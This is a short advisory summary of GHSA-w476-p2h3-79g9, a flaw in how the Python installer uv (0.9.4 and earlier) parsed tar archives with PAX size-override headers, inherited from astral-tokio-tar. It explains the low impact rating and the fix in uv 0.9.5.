GHSA-w476-p2h3-79g9: 
Python vulnerability analysis and mitigation

The vulnerability (GHSA-w476-p2h3-79g9) affects uv versions 0.9.4 and earlier, where tar archives containing PAX headers with file size overrides were not handled properly. The issue was discovered and disclosed on October 21, 2025, affecting the Python package installer uv. This vulnerability stems from a flaw in the underlying astral-tokio-tar dependency, which was tracked as CVE-2025-62518 (GitHub Advisory).

The vulnerability originates from inconsistent handling of PAX extended headers versus ustar headers when determining file data boundaries. When processing archives with PAX-extended headers containing size overrides, the parser incorrectly advances stream position based on ustar header size (often zero) instead of the PAX-specified size, causing it to interpret file content as legitimate tar headers. The issue was fixed in astral-tokio-tar version 0.5.6, which was incorporated into uv version 0.9.5 (GitHub Release).

The impact of this vulnerability is considered low despite the underlying astral-tokio-tar vulnerability being rated as high. This is because uv only processes tar archives from source distributions, which already possess the capability for full arbitrary code execution by design. An attacker could create a source distribution that would extract differently when installed via uv versus other Python package installers, but this doesn't grant additional capabilities beyond what's already possible with source distributions (GitHub Advisory).

The vulnerability has been patched in uv version 0.9.5. Users are advised to upgrade to version 0.9.5 or newer to address this advisory. No breaking changes are expected as a result of the patch. The fix involves updating the astral-tokio-tar dependency to version 0.5.6, which contains the proper handling of PAX headers (GitHub Release).